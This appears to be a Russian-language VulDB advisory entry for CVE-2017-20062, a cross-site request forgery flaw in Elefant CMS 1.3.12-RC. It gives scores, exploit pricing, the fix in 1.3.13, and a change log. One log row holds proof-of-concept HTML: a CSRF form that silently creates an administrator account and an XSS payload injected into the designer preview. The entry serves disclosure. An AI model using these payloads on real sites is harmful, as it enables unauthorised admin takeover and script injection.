Elefant CMS 1.3.12-RC неизвестная уязвимость

Уязвимость, классифицированная как проблемные, была найдена в Elefant CMS 1.3.12-RC. Затронута неизвестная функция. Определение CWE для уязвимости следующее CWE-352. Консультацию можно прочитать на сайте seclists.org. Выявление этой уязвимости является CVE-2017-20062. Атака может быть инициирована удаленно. Технические подробности отсутствуют. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Объявляется proof-of-concept. Эксплойт доступен по адресу seclists.org. Уязвимость обрабатывалась как непубличный эксплойт нулевого дня в течение как минимум 283 дней. Мы ожидаем, что 0-день стоил приблизительно $0-$5k. Обновление до версии 1.3.13 способно решить эту проблему. Рекомендуется обновить затронутый компонент.

Временная шкала

Пользователь

146

Поле

vulnerability_cvss2_researcher_basescore1
cna_responsible1
source_cve1
vulnerability_cwe1
software_type1

Commit Conf

100%50
90%9
98%1

Approve Conf

100%50
90%9
98%1
IDПереданоПользовательПолеИзменениеПримечанияпринятоСтатусC
1263361118.06.2022VulD...cvss2_researcher_basescore5.1see CVSS documentation18.06.2022принято
90
1263361018.06.2022VulD...responsibleVulDB18.06.2022принято
100
1263360918.06.2022VulD...cveCVE-2017-20062cve.org18.06.2022принято
100
641647224.02.2017VulD...cwe352 (подделка межсайтовых запросов)24.02.2017принято
90
641642324.02.2017VulD...typeContent Management System24.02.2017принято
100
641647924.02.2017VulD...0day_days28324.02.2017принято
90
641647824.02.2017VulD...cvss3_vuldb_rcRsee CVSS documentation24.02.2017принято
90
641647724.02.2017VulD...cvss3_vuldb_rlOsee CVSS documentation24.02.2017принято
90
641647624.02.2017VulD...cvss3_vuldb_ePsee CVSS documentation24.02.2017принято
90
641647524.02.2017VulD...cvss2_vuldb_rcURsee CVSS documentation24.02.2017принято
90
641647424.02.2017VulD...cvss2_vuldb_rlOFsee CVSS documentation24.02.2017принято
90
641647324.02.2017VulD...cvss2_vuldb_ePOCsee CVSS documentation24.02.2017принято
90
641647124.02.2017VulD...seealso97260 97261 97255 97256 97257 9725824.02.2017принято
100
641647024.02.2017VulD...upgrade_version1.3.13see version documentation24.02.2017принято
100
641646924.02.2017VulD...nameОбновление24.02.2017принято
100
641646824.02.2017VulD...sourcecode<html> <body> <form action="http://localhost/user/add"; method ="POST"> <input type="hidden" name="name" value="admin3" /> <input type= "hidden" name="email" value="admin3 () example com" /> <input type="hidden" name= "password" value="admin3" /> <input type="hidden" name="verify_pass" value= "admin3" /> <input type="hidden" name="type" value="admin" /> <input type= "hidden" name="company" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name= "photo" value="" /> <input type="hidden" name="about" value="" /> <input type= "hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name= "address2" value="" /> <input type="hidden" name="city" value="" /> <input type ="hidden" name="state" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="zip" value="" /> <input type="submit" value= "Submit request" /> </form> </body> </html> XSS: <html> <body> <form action= "http://localhost/designer/preview"; method="POST"> <input type="hidden" name= "layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value= "Submit request" /> </form> </body> </html>24.02.2017принято
100
641646724.02.2017VulD...price_0day$0-$5ksee exploit price documentation24.02.2017принято
100
641646624.02.2017VulD...developer_nameTim Coen24.02.2017принято
100
641646524.02.2017VulD...urlhttp://seclists.org/fulldisclosure/2017/Feb/37seclists.org24.02.2017принято
100
641646424.02.2017VulD...publicity124.02.2017принято
98

40 больше записей не показано

Want to stay up to date on a daily basis?

Enable the mail alert feature now!